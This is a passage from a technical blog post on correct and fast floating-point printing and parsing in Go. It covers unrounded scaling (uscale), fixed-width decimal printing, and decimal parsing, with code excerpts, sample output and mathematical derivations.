Finally, we are going to need to be able to nudge an unrounded number
up or down before computing a ceiling or floor,
as if we added or subtracting a tiny amount.
Let’s add that:
<div class=showcode><pre>func (u unrounded) nudge(δ int) unrounded { return u + unrounded(δ) }</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L67-L66">fpfmt/fpfmt.go:67,66</a></div><div class=showcode-end></div>
<pre class='language-in'>row("x", "nudge(-1).floor", "floor", "ceil", "nudge(+1).ceil")
for _, x := range []float64{15, 15.1, 15.9, 16} {
u := unround(x)
row(u, u.nudge(-1).floor(), u.floor(), u.ceil(), u.nudge(+1).ceil())
}
</pre>
<pre class='language-out'>x nudge(-1).floor floor ceil nudge(+1).ceil
⟨15.0⟩ 14 15 15 16
⟨15.0+⟩ 15 15 16 16
⟨15.5+⟩ 15 15 16 16
⟨16.0⟩ 15 16 16 17
</pre>
<p>
Floating-point hardware maintains three extra bits to round
all arithmetic operations correctly.
For just division and right shift, we can get by with only two bits.
<a class=anchor href="#scale"><h2 id="scale">Unrounded Scaling</h2></a>
<p>
The fundamental insight of this post is that all
floating-point conversions can be written correctly
and simply using <i>unrounded scaling</i>,
which multiplies a number <math><mi>x</mi></math> by a power of two and a power of ten
and returns the unrounded product.<div class=math><math display=block><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo><mo>=</mo><mrow><mtext>⟨</mtext><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mtext>⟩</mtext></mrow><mn>.</mn></mrow></math></div>
<p>
When <math><mi>p</mi></math> is negative, the value <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>
cannot be stored exactly in any finite binary floating-point number,
so any implementation of uscale must be careful.
<p>
In Go, we can implement uscale using big integers and an unrounded division:
<pre>func uscale(x uint64, e, p int) unrounded {
num := mul(big(4), big(x), pow(2, max(0, p)), pow(10, max(0, e)))
denom := mul( pow(2, max(0, -p)), pow(10, max(0, -e)))
div, mod := divmod(num, denom)
return unrounded(div.uint64() | bool2[uint64](!mod.isZero()))
}
</pre>
<p>
The <code>max</code> expressions choose between multiplying <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup></mrow></math> into <code>num</code> when <math><mrow><mi>e</mi><mo>></mo><mn>0</mn></mrow></math>
or multiplying <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mi>e</mi></mrow></msup></mrow></math> into <code>denom</code> when <math><mrow><mi>e</mi><mo><</mo><mn>0</mn></mrow></math>,
and similarly for <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>.
The <code>divmod</code> implements the floor, and <code>mod.isZero</code> reports
whether the floor was exact.
<p>
This implementation of uscale is correct but inefficient.
In our usage, <math><mi>e</mi></math> and <math><mi>p</mi></math> will mostly cancel out,
typically with opposite signs,
and the input <math><mi>x</mi></math> and result <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>,
will always fit in 64 bits.
That limited input domain and range makes it possible
to implement a very fast, completely accurate uscale,
and we’ll see that implementation later.
<p>
Our actual implementation will be split into two functions,
to allow sharing some computations derived from <math><mi>p</mi></math> and <math><mi>e</mi></math>.
Instead of <code>uscale(x, e, p)</code>, the fast Go version will be called as <code>uscale(x, prescale(e, p, log2Pow10(p)))</code>.
Also, callers are responsible for passing in an <math><mi>x</mi></math> left-shifted to have its
high bit set.
The <code>unpack</code> function we looked at already arranged that for its result,
but otherwise callers need to do something like:
<pre>shift = 64 - bits.Len64(x)
... uscale(x<<shift, prescale(e-shift, p, log2Pow10(p))) ...
</pre>
<p>
Conceptually, uscale maps numbers on one fixed-point scale to numbers on another,
including converting between binary and decimal scales.
For example, consider the scales <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>13</mn></mrow></msup></mrow></math> and <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>4</mn></mrow></msup></mrow></math>:
<p>
<img name="fpfmt-ruler-scale" class="center pad" width=210 height=250 src="fpfmt-ruler-scale.svg">
<p>
Given <math><mi>x</mi></math> from the <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>13</mn></mrow></msup></mrow></math> side,
<math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><MO form='prefix'>−</MO><mn>13</mn><mo>,</mo><mn>4</mn><mo stretchy=false>)</mo></mrow></math> maps to the equivalent
point on the <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>4</mn></mrow></msup></mrow></math> side;
and given <math><mi>x</mi></math> from the <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>4</mn></mrow></msup></mrow></math>,
<math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mn>13</mn><mo>,</mo><MO form='prefix'>−</MO><mn>4</mn><mo stretchy=false>)</mo></mrow></math> maps to the equivalent
point on the <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>13</mn></mrow></msup></mrow></math> side.
Before we look at the fast implementation of <math><mtext>uscale</mtext></math>,
let’s look at how it simplifies all the floating-point printing
and parsing algorithms.
<a class=anchor href="#fixed-width_printing"><h2 id="fixed-width_printing">Fixed-Width Printing</h2></a>
<p>
Our first application of uscale is fixed-width printing.
Given <math><mrow><mi>f</mi><mo>=</mo><mi>m</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup></mrow></math>, we want to compute its
approximate equivalent
<math><mrow><mi>d</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mtext><i>de</i></mtext></msup></mrow></math>, where <math><mi>d</mi></math> has exactly <math><mi>n</mi></math> digits.
It only takes 17 digits to uniquely identify any float64,
so we’re willing to limit <math><mrow><mi>n</mi><mo>≤</mo><mn>18</mn></mrow></math>,
which will ensure <math><mi>d</mi></math> fits in a uint64.
The strategy is to multiply <math><mi>f</mi></math> by <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> for some <math><mi>p</mi></math>
and then round it to an integer <math><mi>d</mi></math>.
Then the result is <math><mrow><mi>d</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mi>p</mi></mrow></msup></mrow></math>.
<p>
The <math><mi>n</mi></math>-digit requirement means <math><mrow><mi>d</mi><mo>=</mo><mi>m</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>∈</mo><mo stretchy=false>[</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><mi>n</mi><MO lspace='0' rspace='0'>−</MO><mn>1</mn></mrow></msup><mo>,</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>n</mi></msup><mo stretchy=false>)</mo></mrow></math>.
From this we can derive <math><mi>p</mi></math>:<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mi>m</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>[</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><mi>n</mi><MO lspace='0' rspace='0'>−</MO><mn>1</mn></mrow></msup><mo>,</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>n</mi></msup><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mi>m</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>10</mn><msup><mspace height='0.66em' /><mrow><mi>n</mi><MO lspace='0' rspace='0'>−</MO><mn>1</mn></mrow></msup><mo>·</mo><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>10</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[factoring</mtext><mspace width='0.3em' /><mtext>range]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mi>m</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo stretchy=false>)</mo><mo>+</mo><mi>p</mi></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mi>n</mi><mo>−</mo><mn>1</mn><mo>+</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[taking</mtext><mspace width='0.3em' /><mtext>log]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>p</mi></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mi>n</mi><mo>−</mo><mn>1</mn><mo>−</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mi>m</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo stretchy=false>)</mo><mo>+</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[isolating</mtext><mspace width='0.3em' /></mrow><mi>p</mi><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>p</mi></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mi>n</mi><mo>−</mo><mn>1</mn><mo>−</mo><mo stretchy=false>(</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mi>m</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo stretchy=false>)</mo><mo>−</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>1</mn><mo stretchy=false>)</mo><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>[regrouping]</mtext></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>p</mi></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mi>n</mi><mo>−</mo><mn>1</mn><mo>−</mo><mrow><mo stretchy=false>⌊</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mi>m</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo stretchy=false>⌋</mo></mrow></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[</mtext><mi>p</mi><mrow><mspace width='0.3em' /><mtext>is</mtext><mspace width='0.3em' /><mtext>an</mtext><mspace width='0.3em' /><mtext>integer]</mtext></mrow></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>p</mi></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mi>n</mi><mo>−</mo><mn>1</mn><mo>−</mo><mrow><mo stretchy=false>⌊</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mn>2</mn><mo stretchy=false>)</mo><mo>·</mo><mo stretchy=false>(</mo><mi>e</mi><mo>+</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mi>m</mi><mo stretchy=false>)</mo><mo stretchy=false>⌋</mo></mrow></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[changing</mtext><mspace width='0.3em' /><mtext>log</mtext><mspace width='0.3em' /><mtext>base]</mtext></mrow></mtd></mtr></mtable></math></div>
<p>
It is okay for <math><mi>p</mi></math> to be too big—we will get an extra digit that we can divide away—so
we can approximate <math><mrow><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mi>m</mi></mrow></math> as <math><mrow><mtext>bits</mtext><mo stretchy=false>(</mo><mi>m</mi><mo stretchy=false>)</mo><mo>−</mo><mn>1</mn></mrow></math>, where <math><mrow><mtext>bits</mtext><mo stretchy=false>(</mo><mi>m</mi><mo stretchy=false>)</mo></mrow></math> is the bit length of <math><mi>m</mi></math>.
That gives us <math><mrow><mi>p</mi><mo>=</mo><mi>n</mi><mo>−</mo><mn>1</mn><mo>−</mo><mrow><mo stretchy=false>⌊</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mn>2</mn><mo stretchy=false>)</mo><mo>·</mo><mo stretchy=false>(</mo><mi>e</mi><mo>+</mo><mtext>bits</mtext><mo stretchy=false>(</mo><mi>m</mi><mo stretchy=false>)</mo><mo>−</mo><mn>1</mn><mo stretchy=false>)</mo><mo stretchy=false>⌋</mo></mrow></mrow></math>.
With this derivation of <math><mi>p</mi></math>, uscale does the rest of the work.
<p>
The floor expression is a simple linear function and can be computed
exactly for our inputs using fixed-point arithmetic:
<div class=showcode><pre><span class=showcode-comment>// log10Pow2(x) returns ⌊log₁₀ 2**x⌋ = ⌊x * log₁₀ 2⌋.</span>
func log10Pow2(x int) int {
<span class=showcode-comment>// log₁₀ 2 ≈ 0.30102999566 ≈ 78913 / 2^18</span>
return (x * 78913) >> 18
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L78-L81">fpfmt/fpfmt.go:78,81</a></div><div class=showcode-end></div>
<p>
The <code>log2Pow10</code> function, which we mentioned above and need to
use when calling <code>prescale</code>, is similar:
<div class=showcode><pre><span class=showcode-comment>// log2Pow10(x) returns ⌊log₂ 10**x⌋ = ⌊x * log₂ 10⌋.</span>
func log2Pow10(x int) int {
<span class=showcode-comment>// log₂ 10 ≈ 3.32192809489 ≈ 108853 / 2^15</span>
return (x * 108853) >> 15
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L84-L87">fpfmt/fpfmt.go:84,87</a></div><div class=showcode-end></div>
<p>
Now we can put everything together:
<div class=showcode><pre><span class=showcode-comment>// FixedWidth returns the n-digit decimal form of f as d * 10**p.</span>
<span class=showcode-comment>// n can be at most 18.</span>
func FixedWidth(f float64, n int) (d uint64, p int) {
if n > 18 {
panic("too many digits")
}
m, e := unpack64(f)
p = n - 1 - log10Pow2(e+63)
u := uscale(m, prescale(e, p, log2Pow10(p)))
d = u.round()
if d >= uint64pow10[n] {
d, p = u.div(10).round(), p-1
}
return d, -p
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L96-L109">fpfmt/fpfmt.go:96,109</a></div><div class=showcode-end></div>
<p>
That’s the entire conversion!
<p>
The code splits <math><mi>f</mi></math> into <math><mi>m</mi></math>, <math><mi>e</mi></math>;
computes <math><mi>p</mi></math> as just described;
and then uses <code>uscale</code> and <code>round</code> to compute
<math><mrow><mi>d</mi><mo>=</mo><mi>f</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>.
If the result has an extra digit,
either because our approximate log made <math><mi>p</mi></math> too big,
or because of rollover during rounding,
we divide the unrounded form by 10, round again, and update <math><mi>p</mi></math>.
When we approximated <math><mrow><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mi>m</mi></mrow></math> by counting bits,
we used the exact log of the greatest power of two less than or equal to <math><mi>m</mi></math>,
so the computed <math><mi>d</mi></math> must be less than twice the intended limit <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>n</mi></msup></mrow></math>,
meaning the leading digit (if there are too many digits) must be 1.
And rollover only happens for ‘<math><mrow><mn>999</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /></mrow></math>’,
so it is not possible to have both an extra digit and rollover.
<p>
As an example conversion,
consider a float64 approximation of <math><mi>π</mi></math> (<math><mrow><mtext><code>0x1921fb54442d18</code></mtext><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>51</mn></mrow></msup></mrow></math>) to 15 decimal digits.
We have <math><mrow><mi>e</mi><mo>=</mo><MO form='prefix'>−</MO><mn>51</mn></mrow></math>, <math><mrow><mi>n</mi><mo>=</mo><mn>15</mn></mrow></math>, and <math><mrow><mtext>bits</mtext><mo stretchy=false>(</mo><mi>m</mi><mo stretchy=false>)</mo><mo>=</mo><mn>53</mn></mrow></math>,
so <math><mrow><mi>p</mi><mo>=</mo><mi>n</mi><mo>−</mo><mn>1</mn><mo>−</mo><mrow><mo stretchy=false>⌊</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mn>2</mn><mo stretchy=false>)</mo><mo>·</mo><mo stretchy=false>(</mo><mi>e</mi><mo>+</mo><mtext>bits</mtext><mo stretchy=false>(</mo><mi>m</mi><mo stretchy=false>)</mo><mo>−</mo><mn>1</mn><mo stretchy=false>)</mo><mo stretchy=false>⌋</mo></mrow><mo>=</mo><mn>14</mn></mrow></math>.
<p>
The <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>51</mn></mrow></msup></mrow></math> and <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>14</mn></mrow></msup></mrow></math> scales align like this:
<p>
<img name="fpfmt-ruler-pi" class="center pad" width=340 height=190 src="fpfmt-ruler-pi.svg">
<p>
Then <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mtext><code>0x1921fb54442d18</code></mtext><mo>,</mo><MO form='prefix'>−</MO><mn>51</mn><mo>,</mo><mn>14</mn><mo stretchy=false>)</mo></mrow></math> returns the unrounded number ‘314159265358979.0+’,
which rounds to 314159265358979.
Our answer is then <math><mrow><mn>314159265358979</mn><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>14</mn></mrow></msup></mrow></math>.
<a class=anchor href="#parsing_decimals"><h2 id="parsing_decimals">Parsing Decimals</h2></a>
<p>
Unrounded scaling also lets us parse decimal representations of floating-point numbers efficiently.
Let’s assume we’ve taken care of parsing a string like ‘1.23e45’
and now have an integer and exponent like <math><mrow><mi>d</mi><mo>=</mo><mn>123</mn></mrow></math>, <math><mrow><mi>p</mi><mo>=</mo><mn>45</mn><mo>−</mo><mn>2</mn><mo>=</mo><mn>43</mn></mrow></math>.
To convert <math><mrow><mi>d</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> to a float64,
we can choose an appropriate <math><mi>e</mi></math> so that <math><mrow><mi>d</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>52</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>53</mn></msup><mo stretchy=false>)</mo></mrow></math>
and then return <math><mrow><mo stretchy=false>[</mo><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>d</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo><mo stretchy=false>]</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mi>e</mi></mrow></msup></mrow></math>.
<p>
The derivation of <math><mi>e</mi></math> is similar to the derivation of <math><mi>p</mi></math> for printing:<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mi>d</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>52</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>53</mn></msup><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mi>d</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>2</mn><msup><mspace height='0.66em' /><mn>52</mn></msup><mo>·</mo><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>2</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[factoring</mtext><mspace width='0.3em' /><mtext>range]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mi>d</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>)</mo><mo>+</mo><mi>e</mi></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>52</mn><mo>+</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[taking</mtext><mspace width='0.3em' /><mtext>log]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>e</mi></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>52</mn><mo>−</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mi>d</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>)</mo><mo>+</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[isolating</mtext><mspace width='0.3em' /></mrow><mi>e</mi><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>e</mi></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>52</mn><mo>−</mo><mo stretchy=false>(</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mi>d</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>)</mo><mo>−</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>1</mn><mo stretchy=false>)</mo><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>[regrouping]</mtext></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>e</mi></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>52</mn><mo>−</mo><mrow><mo stretchy=false>⌊</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mi>d</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>⌋</mo></mrow></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[</mtext><mi>p</mi><mrow><mspace width='0.3em' /><mtext>is</mtext><mspace width='0.3em' /><mtext>an</mtext><mspace width='0.3em' /><mtext>integer]</mtext></mrow></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>e</mi></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>52</mn><mo>−</mo><mrow><mo stretchy=false>⌊</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mi>d</mi><mo stretchy=false>)</mo><mo>+</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mn>10</mn><mo stretchy=false>)</mo><mo>·</mo><mi>p</mi><mo stretchy=false>⌋</mo></mrow></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[changing</mtext><mspace width='0.3em' /><mtext>log</mtext><mspace width='0.3em' /><mtext>base]</mtext></mrow></mtd></mtr></mtable></math></div>
<p>
Once again, it is okay to overestimate <math><mi>e</mi></math>, so we can approximate
<math><mrow><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mi>d</mi><mo>=</mo><mtext>bits</mtext><mo stretchy=false>(</mo><mi>d</mi><mo stretchy=false>)</mo><mo>−</mo><mn>1</mn></mrow></math>, yielding <math><mrow><mi>e</mi><mo>=</mo><mn>53</mn><mo>−</mo><mtext>bits</mtext><mo stretchy=false>(</mo><mi>d</mi><mo stretchy=false>)</mo><mo>−</mo><mrow><mo stretchy=false>⌊</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mn>10</mn><mo stretchy=false>)</mo><mo>·</mo><mi>p</mi><mo stretchy=false>⌋</mo></mrow></mrow></math>.
If <math><mi>e</mi></math> is very large, <math><mrow><mo>−</mo><mi>e</mi></mrow></math> will be very small,
meaning we will be creating a subnormal,
so we need to round to a smaller number of bits.
To handle this, we cap <math><mi>e</mi></math> at 1074,
which caps <math><mrow><mo>−</mo><mi>e</mi></mrow></math> at <math><mrow><mo>−</mo><mn>1074</mn></mrow></math>.
As before, due to the approximation of <math><mrow><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mi>d</mi></mrow></math>, the scaled result is at most twice as large as our target,
meaning it might have one extra bit to shift away.
<div class=showcode><pre><span class=showcode-comment>// Parse rounds d * 10**p to the nearest float64 f.</span>
<span class=showcode-comment>// d can have at most 19 digits.</span>
func Parse(d uint64, p int) float64 {
if d > 1e19 {
panic("too many digits")
}
b := bits.Len64(d)
e := min(1074, 53-b-log2Pow10(p))
u := uscale(d<<(64-b), prescale(e-(64-b), p, log2Pow10(p)))
m := u.round()
if m >= 1<<53 {
m, e = u.rsh(1).round(), e-1
}
return pack64(m, -e)
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/unopt/fpfmt.go#L111-L124">fpfmt/unopt/fpfmt.go:111,124</a></div><div class=showcode-end></div>
<p>
<code>FixedWidth</code> and <code>Parse</code> demonstrate
exactly how similar printing and parsing really are.
In printing, we are given <math><mi>m</mi></math>, <math><mi>e</mi></math> and
